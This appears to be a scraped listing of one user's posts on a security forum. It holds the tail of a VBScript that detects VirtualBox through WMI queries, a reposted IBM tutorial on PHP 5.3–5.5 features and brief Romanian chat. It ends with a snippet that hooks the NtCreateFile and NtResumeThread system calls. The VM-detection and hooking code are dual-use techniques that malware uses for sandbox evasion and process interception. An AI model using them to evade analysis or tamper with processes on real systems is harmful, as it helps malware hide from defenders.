"virtualbox graphics adapter" Then WScript.Echo "Win32_PnPEntity ==> PnPEntity.Caption ==> " & PnPEntity.Caption VBoxFound = True End If End If If Not IsNull(PnPEntity.Description) Then DescPnPEntity = LCase(PnPEntity.Description) If DescPnPEntity = "virtualbox device" Or DescPnPEntity = "virtualbox graphics adapter" Then WScript.Echo "Win32_PnPEntity ==> PnPEntity.Description ==> " & PnPEntity.Description VBoxFound = True End If End If 'Had to remove .Manufacturer as it detects Host as well 'If Not IsNull(PnPEntity.Manufacturer) Then 'ManuPnPEntity = LCase(PnPEntity.Manufacturer) 'If ManuPnPEntity = "oracle corporation" Then 'WScript.Echo "Win32_PnPEntity ==> PnPEntity.Manufacturer ==> " & PnPEntity.Manufacturer 'VBoxFound = True 'End If 'End If If Not IsNull(PnPEntity.Service) Then SrvPnPEntity = LCase(PnPEntity.Service) If SrvPnPEntity = "vboxguest" Or SrvPnPEntity = "vboxvideo" Then WScript.Echo "Win32_PnPEntity ==> PnPEntity.Service ==> " & PnPEntity.Service VBoxFound = True End If End If If Not IsNull(PnPEntity.DeviceID) Then DeviceIDPnPEntity = LCase(PnPEntity.DeviceID) If InStr(1,DeviceIDPnPEntity,"diskvbox_") > 0 Or InStr(1,DeviceIDPnPEntity,"cdromvbox_") > 0 Then WScript.Echo "Win32_PnPEntity ==> PnPEntity.DeviceID ==> " & PnPEntity.DeviceID VBoxFound = True End If End If If Not IsNull(PnPEntity.PNPDeviceID) Then PNPDeviceIDPnPEntity = LCase(PnPEntity.PNPDeviceID) If InStr(1,PNPDeviceIDPnPEntity,"diskvbox_") > 0 Or InStr(1,PNPDeviceIDPnPEntity,"cdromvbox_") > 0 Then WScript.Echo "Win32_PnPEntity ==> PnPEntity.PNPDeviceID ==> " & PnPEntity.PNPDeviceID VBoxFound = True End If End If End If Next If VBoxFound = False Then WScript.Echo "VirtualBox Was Not Found" End If Sursa: waliedassar: VirtualBox Detection Via WQL Queries
  21. Nytro

    Editor DMOZ

    Nytro replied to albertynos's topic in Off-topic

    Am dat submit la RST.
  22. Nytro
    PHP renewed: The new face of PHP Discover the major new language features in PHP PHP has evolved significantly since its early days as a templating language. In the first installment of a four-part series on modern-day PHP programming, PHP expert Eli White examines some of the advancements in PHP 5.3 and higher. Get up to speed on namespaces, traits, closures, generators, and more. View more content in this series | PDF (229 KB) PHP is maintained and developed as an open source project, with hundreds — possibly thousands — of contributors actively working to evolve the language to meet the needs of modern web development. PHP continues to incorporate new programming ideas, and it borrows ideas from other programming languages, yet it maintains a high level of backward compatibility. These qualities have led PHP to its current prominence: The language helps to run 82 percent of the web and powers some of the biggest websites (such as Facebook). And PHP is the core technology behind content-management system (CMS) frameworks such as WordPress, Drupal, Magento, and Joomla! (which together power around 30 percent of the web). If you haven't looked at PHP in a long time (or even in the last couple of years), you might not recognize the language that it has become. This article, the first in a four-part series, introduces you to the latest features added in recent releases such as PHP 5.3, 5.4, and 5.5. Of course, PHP isn't changing in a vacuum, and new language features are only part of PHP's overall evolution. Ways in which PHP programmers are assembling their development servers, managing their third-party libraries, and addressing web security are also changing. Subsequent installments in this series will look into those aspects of the evolving PHP ecosystem. “I don't think anybody steals anything; all of us borrow.” B.B. King Namespaces About this series Continuously evolving under the aegis of an active open source project, PHP now powers much of the web. PHP has undergone remarkable changes since its early days as a templating language. If you haven't used or evaluated PHP technology in many years, you'd barely even recognize some current PHP projects. This series shows you the latest PHP features and how to use today's PHP to build modern, secure websites. Namespaces are a programming feature designed to allow classes (and functions) within different libraries to have the exact same names. Name conflicts started to become a major problem as PHP grew as a language and the reuse of code libraries became more prevalent. By segmenting each library into its own namespace, you can — with no bad consequences — install and use a third-party library that includes any classes whose names happen to match your own. Before support for namespaces was built in, libraries solved this issue by prefacing all of their classes with a consistent phrase, such as Zend_ in the case of the Zend Framework. You could end up with esoteric class names such as Zend_Db_Table and need to type such prefixes repeatedly while coding. The problem came to a head when the (much needed) DateTime classes were added into the core of PHP at version 5.2. Suddenly, many open source libraries began breaking because they had created their own classes called DateTime to fill the gap. Namespaces are created via the namespace keyword and separated by a backslash (\). Listing 1 shows a simple example. Listing 1. Simple namespace usage <?php namespace zebra; class DateTime { public function __construct() { echo "Today!"; } } function stripes() { echo "-=-=-=-=-=-=-=-"; } In Listing 1, I define my own namespace, called zebra, and then define both a class and a function within it. Redefining the DateTime class in this case doesn't cause any issues or errors, because I make my own version of DateTime inside the namespace. Now I can use the namespace by referencing the full name with \ as a separator, as shown in Listing 2. Listing 2. Using a custom namespace <?php include 'listing1.php'; // Use the stripes function I declared in my namespace: zebra\stripes(); // Use my own DateTime class: $dt = new zebra\DateTime(); // Now use the 'root' level Datetime class: $real = new \DateTime('tomorrow noon'); echo $real->format(\DateTime::ATOM); On line 2 of Listing 2, I include the file (listing1.php) that starts with the namespace directive. Then I can reference my classes and functions by prefacing them with the zebra\ namespace. I can also still use the global-level classes, such as the original DateTime, by prepending the backslash to denote the global namespace. The technique in Listing 2 is handy, but there's a way to make the code simpler-looking: the new use keyword. This keyword states that you want to have direct access to a specific class from within that namespace, as shown in Listing 3. Listing 3. Including the namespace with use <?php include 'listing1.php'; [B]use zebra\DateTime;[/B] // Use our own DateTime class: $dt = new DateTime(); You can also have the use keyword create aliases, so that you can rename any class to something else for the scope you are in. Listing 4 shows how to create an alias. Listing 4. Creating an alias <?php include 'listing1.php'; [B]use zebra\DateTime as ZDT;[/B] // Use our own DateTime class: $dt = new ZDT(); You can do much more with namespaces than I've touched on here, including creating subnamespaces. Dig deeper in the official documentation. READ:Namespaces documentation on php.net Traits Object-oriented programming is traditionally based deeply on the concept of classes and objects that inherit from one another. You begin with an abstract concept and continually subclass with children as you get more specific about the details. If you need a consistent API between your objects, the concept of interfaces comes into play; there, you can define the methods that the object needs to implement. But what if you don't merely want to declare which methods must exist, but you also want to provide their implementations at the same time? Enter traits. Traits, added in PHP 5.4, are a facility for horizontal code reuse (whereas inheritance is vertical code reuse). In other languages this feature is sometimes called a mixin. The concept is straightforward in either case. A trait or mixin is a way to develop any number of methods once. Maybe you have some common methods for filtering and manipulating data or business logic that some objects should share. You can save them in a trait and then reuse them in any class that you might want. Listing 5 shows a simplified example of providing a logging method that any class can use as a consistent way to log events. Listing 5. Declaring and using a trait <?php trait logging { private static $LOG_ERROR = 100; private static $LOG_WARNING = 50; private static $LOG_NOTICE = 10; protected $log_location = 'output.log'; protected function log($level, $msg) { $output = []; $output[] = "Class: ".__CLASS__.' | '; $output[] = "Level: {$level} | "; $output = array_merge($output, (array)$msg, ["\n"]); file_put_contents($this->log_location, $output, FILE_APPEND); } } class User { use logging; public function __construct() { $this->log(self::$LOG_NOTICE, 'New User Created'); } } class DB { use logging; private $db = 'localhost:8080'; public function connect() { // ... attempt to connect and fail: $this->log(self::$LOG_ERROR, ['Connection Failed-', $this->db]); } } In Listing 5, the declaration of trait logging begins on line 2. Note that this trait contains a method as well as a number of properties (including static ones). On the surface, the declaration looks similar to that of a class, but it uses the trait keyword instead. Further down in Listing 5, to bring the trait into the User and DB classes, I use the use keyword again. The use logging; directive at the top of their class definitions essentially pulls all of the properties and methods from the logging trait into those classes natively. Now each class has access to all of the logging tools directly, without needing to implement them separately. The magic __CLASS__ variable used inside of the trait becomes the name of the class using the trait at that time, thereby enabling the log messages to be instantly customized to the class. READ:Traits documentation on php.net Closures (a.k.a. anonymous functions) With older versions of PHP, you could create functions programmatically via create_function, and they allowed a workaround for passing functions: sending a function's name as a string and then calling the function via call_user_func and call_user_func_array. This option lacked the elegance of genuine anonymous functions that can be passed between methods and classes or saved in variables with appropriate scope. Anonymous functions reign supreme in JavaScript, and PHP programmers who don't also know JavaScript are rare. So it was natural for PHP to evolve to include anonymous functions. As of PHP 5.3, you can use normal function-declaration syntax at any point where a variable could be used (for storage or passing). As an example, Listing 6 shows the old way of using the built-in sorting functions to specify your own custom sorting function. Listing 6. The old way of passing functions <?php $insurees = [ 'u4937' => ['name' => 'Thomas Smythe', 'age' => 33], 'u1282' => ['name' => 'Gayle Runecor', 'age' => 25], 'u9275' => ['name' => 'Sara Pinnicle', 'age' => 57], 'u2078' => ['name' => 'Delilah Shock', 'age' => 41], ]; function insuree_age_sort($a, $ { if ($a['age'] == $b['age']) { return 0; } return ($a['age'] > $b['age']) ? -1 : 1; } uasort($insurees, 'insuree_age_sort'); Listing 6 is somewhat clunky because of the need to define a function in the same scope and then use it — even if you'll never use it again. With closures, you can now directly create and use the function in one step. Listing 7 shows an example of this much more elegant solution. Listing 7. Using an anonymous function for sorting <?php uasort($insurees, function ($a, $ { if ($a['age'] == $b['age']) { return 0; } return ($a['age'] > $b['age']) ? -1 : 1; }); Still, anyone would be hard-pressed to claim that this minor use case is the sole justification for this feature. But realize what is happening here. This function I create on the fly to pass into uasort() is a first-class variable citizen. You can store functions in variables and pass them around to different functions and classes. The real power of closures is evident when you look at the scoping feature that was added to PHP along with closures. With the overloaded use keyword, you can specify certain variables in the current scope that the function should have access to. In this way, you can handle fairly complicated details without needing to constantly pass them into the function each time while accessing the function from its variable form. The (somewhat contrived) examples in Listing 8 and Listing 9 demonstrate this power. Listing 8 uses inherited variable scope in a callback. Listing 8. Using inherited variable scope in callback <?php // Find only people over a certain age $minage = 40; $over = array_filter($insurees, function($a) use ($minage) { return ($a['age'] >= $minage); }); Listing 9 uses closures with multiple variable and direct calls. Listing 9. Closures with multiple variables and direct calls <?php $urls = [ 'training' => '/training', 'magazine' => '/magazine', 't-shirt' => '/swag/tshirts', ]; $current = $_SERVER['REQUEST_URI']; // May come from somewhere else // Helper for links, ignoring links if we are on that page: $link = function($name) use ($urls, $current) { if ($current == $urls[$name]) { return $name; } else { return "<a href=\"{$urls[$name]}\">{$name}</a>"; } }; ?> <p>Welcome to our website! Make sure to check out our <?= $link('training') ?> offerings, see the latest issue of our <?= $link('magazine'); ?>, and don't forget to check out our latest <?= $link('t-shirt') ?> designs as well.</p> If you're used to working with closures in JavaScript, then you're already familiar with their power, flexibility, and sometimes dangerous nature. READ:Closures documentation on php.net Generators When PHP 5.0 was released, it came with the beginnings of the Standard PHP Library (SPL). The SPL was meant to be a collection of standardized ways to solve certain computer-science problems, such as creating queues and linked lists (and to provide extensible features such as class-file autoloaders). One feature included in the SPL is called an iterator. Iterator is an interface (with a collection of prebuilt classes) that you can use to make any class capable of being looped over as if it were an array, through the foreach keyword. This amazing invention makes it possible for all "lists of things" be to walked over in a uniform fashion. But Iterator is a fairly complicated system that requires you to create a class and define four methods. Sometimes you want the capability of a standard foreach loop but don't need the overhead of a class structure to achieve it. With the newer generator feature, you can — via the yield keyword — make a function that generates a list of values and offers them back one at a time. Essentially, instead of returning one value, you yield as many values as you want. Then you can use a foreach loop on your function to retrieve all the values that the function wants to yield back. Listing 10 shows a simple example of a function to divide a range of values into equal parts and return them. Listing 10. A generator to divide into parts <?php function parts($start, $end, $parts) { // Find what our actual length is: $length = $end - $start; do { $start += $length / $parts; yield $start; } while ($start < $end); } // Break 5 feet into 3 parts: foreach (parts(0, 5, 3) as $l) { echo $l, " "; } echo "\n"; // Break the range 10-90 into 2 parts: foreach (parts(10, 90, 12) as $l) { echo $l, " "; } echo "\n"; The magic happens on line 7, where the yield keyword is used. At this point, essentially, the function stops executing, and the value that was yielded is returned. On each subsequent call to the function, execution begins where it left off, until the next yield happens or the function ends. This example was obviously rather contrived, but you could imagine using this technique over the results of a database query, or on the results returned from parsing an XML file. You can even yield keys as well as values, to directly mimic an array by using the syntax yield $key => $value, as shown in the XML-based example in Listing 11. Listing 11. Using a generator to process XML <?php $xml = <<<EOXML <?xml version="1.0" encoding="UTF-8" ?> <products> <books> <book isbn="978-1940111001">Mastering the SPL Library</book> <book isbn="978-1940111056">Functional Programming in PHP</book> <book isbn="978-0981034508">Guide to Date and Time Programming</book> <book isbn="0973589825">Guide to PHP Design Patterns</book> </books> </products> EOXML; $books = function () use ($xml) { $products = simplexml_load_string($xml); foreach ($products->books->book as $book) { yield $book['isbn'] => (string)$book; } }; foreach ($books() as $isbn => $title) { echo "{$isbn}: {$title}\n"; } READ:Generators documentation on php.net And much, much more ... All of the new features in PHP are too numerous to cover here in detail. Table 1 is a quick list of some other notable additions from the last few years. Table 1. Other new PHP language features [TABLE=class: ibm-data-table] [TR] [TH]Feature[/TH] [TH=class: ibm-numeric]Version[/TH] [TH]Description[/TH] [/TR] [TR] [TH=class: ibm-table-row] Late static binding [/TH] [TD=class: ibm-numeric]5.3[/TD] [TD]The ability for a parent class to call a static method or property that is defined by one of its children/inheritors (the opposite of how this is usually done). For example, allows for generic functionality to exist in a parent class that takes in configuration from its extended children.[/TD] [/TR] [TR] [TH=class: ibm-table-row] Nowdoc syntax [/TH] [TD=class: ibm-numeric]5.3[/TD] [TD]The ability to specify a string as a block of text without variables within it being interpreted.[/TD] [/TR] [TR] [TH=class: ibm-table-row] Shortcut ternary (? [/TH] [TD=class: ibm-numeric]5.3[/TD] [TD]The ability to omit the middle of a standard ternary operator, such that the true condition defaults back to the original comparison value. Example: $result = $value ?: 0;[/TD] [/TR] [TR] [TH=class: ibm-table-row] Jump labels (goto) [/TH] [TD=class: ibm-numeric]5.3[/TD] [TD]While not considered by some to be 'moving forward' with the language, the goto operator was added so that certain coding exercises, such as the creation of state machines, could more easily be done inside of PHP.[/TD] [/TR] [TR] [TH=class: ibm-table-row] Magic methods __callStatic __invoke __debugInfo[/TH] [TD=class: ibm-numeric]5.3 5.3 5.6[/TD] [TD]These three new magic methods were added to the others available since PHP 5.0 to complete the powerful slate of options you can use when designing your classes. Now you can have overloaded and undefined static methods, call your object as if it were a function, and control what's output when you debug your object.[/TD] [/TR] [TR] [TH=class: ibm-table-row] Always-on shortcode echo (<?=) [/TH] [TD=class: ibm-numeric]5.4[/TD] [TD]Previously if you had disabled shortcodes in PHP, all variations were turned off. As of PHP 5.4, the <?= shortcode, which is commonly used in templating, is always available to you.[/TD] [/TR] [TR] [TH=class: ibm-table-row] Short array syntax [/TH] [TD=class: ibm-numeric]5.4[/TD] [TD]Instead of declaring your arrays as array(1,2,3), you can now use brackets, as in: [1,2,3][/TD] [/TR] [TR] [TH=class: ibm-table-row] Built-in web server [/TH] [TD=class: ibm-numeric]5.4[/TD] [TD]The PHP runtime now comes with a built-in web server, making it much easier to do simple code testing and development without the need for configuring Apache or IIS.[/TD] [/TR] [/TABLE] Conclusion Modern PHP development doesn't look anything like the old procedural code of days past. And PHP continues to sustain a high rate of development. PHP 7 is already on the horizon, with a late 2015 release date planned. The next installment of this series will look at the realm of ever-changing needs for password protection and what PHP has been doing to help web developers handle this complex requirement. Resources PHP project resources: Check out the developerWorks PHP project resources to expand your PHP skills. "Leveraging PHP V5.3 namespaces for readable and maintainable code" (Dan Denoncourt, developerWorks, March 2011): Get an overview of namespace syntax, learn best practices for its use, and see a miniature sample Model-View-Controller application that uses namespaces. "Leveraging PHP 5.3's lambdas and closures" (Dan Denoncourt, developerWorks, December 2010): Learn more about how and where to use PHP closures. More PHP content: Browse all the PHP content on developerWorks. PHP: The Right Way: Learn more about how to build PHP projects in a modern fashion. PHP Manual: Consult the official source of all PHP documentation. PHPDeveloper.org: Get news, views, and community information for PHP. php[architect]: Check out an online and print magazine dedicated to PHP education and recent news. Sursa: http://www.ibm.com/developerworks/web/library/wa-php-renewed_1/index.html?ca=drs-
  23. Nytro

    Card PIN. Wtf?

    Nytro posted a topic in Off-topic

    Aveti grija.
  24. Nytro
    Aveti /chat.
  25. Nytro
    E super ca e foarte usor de folosit: //Hook NtCreateFile and NtResumeThread AddProxyProcedure("NtCreateFile", 11, NewNtCreateFile); AddProxyProcedure("NtResumeThread", 2, NewNtResumeThread);
×
×
  • Create New...